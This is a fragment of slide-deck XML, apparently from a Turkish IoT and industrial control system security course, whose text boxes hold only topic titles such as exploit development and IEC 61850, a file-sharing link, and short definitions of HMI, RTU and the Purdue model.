          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="554475" y="1389350"/>
            <a:ext cx="4883775" cy="2364775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="300" name="Google Shape;300;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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2114950" y="1925250"/>
            <a:ext cx="5540400" cy="1293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7200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ICS Security</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="72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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:pr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nvGrpSpPr>
          <p:cNvPr id="110" name="Google Shape;110;p17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="2472008"/>
            <a:ext cx="9144000" cy="2671492"/>
            <a:chOff x="0" y="3296011"/>
            <a:chExt cx="12192000" cy="3561989"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="111" name="Google Shape;111;p17"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="0" y="3681702"/>
              <a:ext cx="12192000" cy="3176298"/>
              <a:chOff x="0" y="3681702"/>
              <a:chExt cx="12192000" cy="3176298"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="112" name="Google Shape;112;p17"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="3681702"/>
                <a:ext cx="12192000" cy="3176298"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="3176298" w="12192000">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a:solidFill>
                    <a:schemeClr val="lt1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="113" name="Google Shape;113;p17"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="3681702"/>
                <a:ext cx="12192000" cy="3176298"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="3176298" w="12192000">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lt1">
                  <a:alpha val="13730"/>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a:solidFill>
                    <a:schemeClr val="lt1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="114" name="Google Shape;114;p17"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="544" y="3296011"/>
              <a:ext cx="12191048" cy="2849880"/>
              <a:chOff x="544" y="3296011"/>
              <a:chExt cx="12191048" cy="2849880"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="115" name="Google Shape;115;p17"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="544" y="3296011"/>
                <a:ext cx="12191048" cy="2849880"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="1424940" w="6095524">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a:solidFill>
                    <a:schemeClr val="lt1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="116" name="Google Shape;116;p17"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="544" y="3296011"/>
                <a:ext cx="12191048" cy="2849880"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="1424940" w="6095524">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rotWithShape="1">
                <a:blip r:embed="rId3">
                  <a:alphaModFix amt="57000"/>
                </a:blip>
                <a:tile algn="tl" flip="none" tx="0" sx="100000" ty="0" sy="100000"/>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a:solidFill>
                    <a:schemeClr val="lt1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="Google Shape;117;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="451838" y="1518646"/>
            <a:ext cx="4766700" cy="284700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-254000" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IoT Security Temelleri</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="Google Shape;118;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6353319" y="1053767"/>
            <a:ext cx="1697700" cy="284700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-215900" lvl="0" marL="215900" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ICS Security</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="Google Shape;119;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="980431" y="2004035"/>
            <a:ext cx="4766700" cy="284700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-215900" lvl="0" marL="215900" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IoT Remote Control Apps</a:t>
            </a:r>
            <a:endParaRPr i="0" u="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="Google Shape;120;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1445678" y="2489411"/>
            <a:ext cx="4766700" cy="608100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-215900" lvl="0" marL="215900" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IoT Security </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="342900" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PoC Exploit Code </a:t>
            </a:r>
            <a:endParaRPr i="0" u="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="Google Shape;121;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4111877"/>
            <a:ext cx="372600" cy="372600"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="B3C6E7"/>
              </a:gs>
              <a:gs pos="46000">
                <a:srgbClr val="4C78C6"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="254378"/>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect b="50%" l="50%" r="50%" t="50%"/>
            </a:path>
            <a:tileRect/>
          </a:gradFill>
          <a:ln cap="flat" cmpd="sng" w="12700">
            <a:solidFill>
              <a:srgbClr val="1F3864"/>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a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="Google Shape;122;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="217417" y="1065426"/>
            <a:ext cx="4766700" cy="284700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-215900" lvl="0" marL="215900" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IoT Security</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="Google Shape;123;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5554047" y="2477750"/>
            <a:ext cx="2181900" cy="284700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-215900" lvl="0" marL="215900" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploit Development</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="Google Shape;124;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5292814" y="2003172"/>
            <a:ext cx="3818700" cy="263100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-215900" lvl="0" marL="215900" marR="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Ortamın Hazırlanması</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name="Google Shape;125;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6080925" y="1507000"/>
            <a:ext cx="3063000" cy="284700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-215900" lvl="0" marL="215900" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IEC 61850 (Goose &amp; SV Protocol)</a:t>
            </a:r>
            <a:endParaRPr i="0" u="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="126" name="Google Shape;126;p17" title="IoT&amp;ICS.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3426560" y="715672"/>
            <a:ext cx="2127501" cy="2127501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="127" name="Google Shape;127;p17" title="sol ok.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="1007739">
            <a:off x="2874197" y="1686372"/>
            <a:ext cx="1361953" cy="1361953"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="Google Shape;128;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5306072" y="2935825"/>
            <a:ext cx="2181900" cy="284700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-215900" lvl="0" marL="215900" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sonuçları Değerlendir</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="129" name="Google Shape;129;p17" title="sol ok.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="4301400">
            <a:off x="4583323" y="1594122"/>
            <a:ext cx="1361952" cy="1361952"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="Google Shape;130;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="564100" y="4648725"/>
            <a:ext cx="8644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rPr>
              <a:t>https://e.pcloud.link/publink/show?code=kZ4djtZwwShTuMHLS7VUIPV9yEqQkgbFkw7</a:t>
            </a:r>
            <a:endParaRPr sz="1000">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311" name="Google Shape;311;p44" title="Screenshot 2025-05-30 at 10.26.40.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="413807"/>
            <a:ext cx="9144003" cy="4116587"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="312" name="Google Shape;312;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3144175" y="470375"/>
            <a:ext cx="57504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lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HMI (Human-Machine Interface)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, SCADA sistemlerinde operatörlerin makineleri ve süreçleri görsel arayüz üzerinden izleyip kontrol etmesini sağlayan kullanıcı arabirimidir.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="313" name="Google Shape;313;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4281525" y="4008800"/>
            <a:ext cx="4723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lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RTU (Remote Terminal Unit)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, uzak bir konumdan veri toplamak ve kontrol sinyalleri göndermek için kullanılan endüstriyel otomasyon cihazıdır.</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="314" name="Google Shape;314;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320" name="Google Shape;320;p45" title="Screenshot 2025-05-30 at 10.25.21.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144003" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="321" name="Google Shape;321;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3869550" y="391225"/>
            <a:ext cx="51792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chemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Purdue Modeli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, endüstriyel kontrol sistemleri (ICS) için katmanlı bir ağ mimarisi sunan bir güvenlik standardıdır. Bu model, OT (Operational Technology) ve IT (Information Technology) sistemlerini 0'dan 5'e kadar katmanlara ayırarak güvenlik zonları ve erişim kontrolü sağlar.</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="322" name="Google Shape;322;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328" name="Google Shape;328;p46" title="Screenshot 2025-05-30 at 10.24.42.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4"/>
            <a:ext cx="9144003" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="329" name="Google Shape;329;p46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3925950" y="2019675"/>
            <a:ext cx="88200" cy="128100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="1F232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0" name="Google Shape;330;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pic>
        <p:nvPicPr>
          <p:cNvPr id="335" name="Google Shape;335;p47" title="Screenshot 2025-05-30 at 10.25.56.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1580576" y="325013"/>
            <a:ext cx="6182449" cy="4493475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="336" name="Google Shape;336;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342" name="Google Shape;342;p48" title="Screenshot 2025-05-30 at 10.27.08.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="513457"/>
